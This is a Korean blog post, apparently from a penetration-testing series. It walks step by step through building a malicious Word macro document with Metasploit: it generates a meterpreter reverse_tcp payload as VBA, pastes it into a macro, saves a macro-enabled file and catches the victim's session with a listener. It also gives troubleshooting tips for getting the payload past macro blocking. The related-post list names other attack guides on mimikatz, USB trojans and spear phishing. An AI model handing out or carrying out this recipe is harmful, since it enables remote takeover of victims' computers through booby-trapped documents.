Macro를 사용합니다.
1.use windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 7777
generate -f vba // generate로 각종 스크립트를 만드는데 -f는 아웃풋 옵션, vba는 비주얼베이직 애플리케이션 아웃풋입니다.
위 명령어를 담은 macro.rc 파일을 만들어줍니다. [호스트와 포트는 각자 설정]
2. msfconsole -r macro.rc로 실행
3.나온 vbs 구문을 복사해서 저장해둡니다. [#if... 뭐시기 부터 마지막 end sub 까지 전부 복사]
4.리스닝을 위해 핸들러를 틀어줍니다. [msfconsole -r handler.rc]
5.윈도우에서 워드를 틀고 매크로 기능에서 매크로 추가 -> 이름은 아무거나, 매크로위치는 문서 1로 해서 만들기
6.매크로 코드에 원래있던걸 지우고 아까 나온 vbs 구문을 붙여넣어준다.
7. 그 후 저장을 해주는데 파일 형식은 word 매크로 사용 문서로 정해주어서 저장합니다.
8.핸들러 틀어둔걸 확인하면서 윈도우에서 word를 실행 하면 세션이 잡히는 걸 볼 수 있습니다.
되지않을때 - VBox 같은걸 사용중이라면 해커컴과 피해자컴 간 ping을 해서 연결이 되는지 확인해야합니다.
윈도우가 10과 같은 상위버전이거나 워드가 2007이 아닌 상위버전이면 안될수도 있고, 실행 후 워드가 매크로를 차단시키면 그걸 허용시켜주어야 세션이 잡힙니다.
'2. 시스템 해킹 및 모의 해킹' 카테고리의 다른 글
| mimikatz를 사용해서 윈도우 패스워드 알아내기 (0) | 2023.12.27 |
|---|---|
| USB 트로이목마 만들기 (0) | 2023.12.27 |
| 스피어 피싱 공격 [코발트 스트라이크,이메일 파싱] (0) | 2023.12.27 |
| 껐다 켜도 해킹 세션을 유지시키는 방법 [persistence] (0) | 2023.12.27 |
| MSF pdf파일을 트로이목마로 만들기 (0) | 2023.12.27 |